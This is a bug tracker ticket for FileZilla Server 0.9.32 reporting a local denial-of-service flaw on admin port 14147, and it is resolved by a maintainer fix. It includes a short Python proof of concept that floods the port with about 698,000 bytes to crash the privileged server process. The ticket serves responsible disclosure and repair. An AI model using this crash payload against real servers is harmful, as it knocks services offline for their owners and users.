Opened 10 years ago

Closed 7 years ago

#4693 closed Bug report (fixed)

FileZilla Server version 0.9.32 local denial of service

Reported by: Juan Pablo Lopez Yacubian Owned by:
Priority: critical Component: FileZilla Server
Keywords: crash, admin, 14147, fixed Cc:
Component version: Operating system type: Windows
Operating system version: XP SP3

Description

Hello people

The problem is in a local port (14147) that "filezilla server" used for its interface.

If you send some data to this port, that is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crash.

I did some test with a debugger and i could not run code.. for me is only a denial of service, but is important repair it becuase this process run with the system privileges.

i wrote a poc in python for test

from socket import *

host = "127.0.0.1"
port = 14147

data = "A" * 698000

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(data)
s.close()

OS : Windows Xp SP3 - all patch

see you


Juan Pablo Lopez Yacubian

Attachments (1)

FileZilla Server.7z (242.5 KB) - added by Tim Kosse 10 years ago.

Download all attachments as: .zip

Change History (3)

Changed 10 years ago by Tim Kosse

Attachment: FileZilla Server.7z added

comment:1 Changed 10 years ago by Tim Kosse

Priority: lowcritical
Status: newmoreinfo

Thanks for spotting this.

Please try the attached build of FileZilla Server.

comment:2 Changed 7 years ago by Josh Davis

Keywords: crash admin 14147 fixed added
Resolution: fixed
Status: moreinfoclosed

This is 3 years old, and a fix was released.
If this problem still occurs on current FzServer, please reopen this ticket.

Note: See TracTickets for help on using tickets.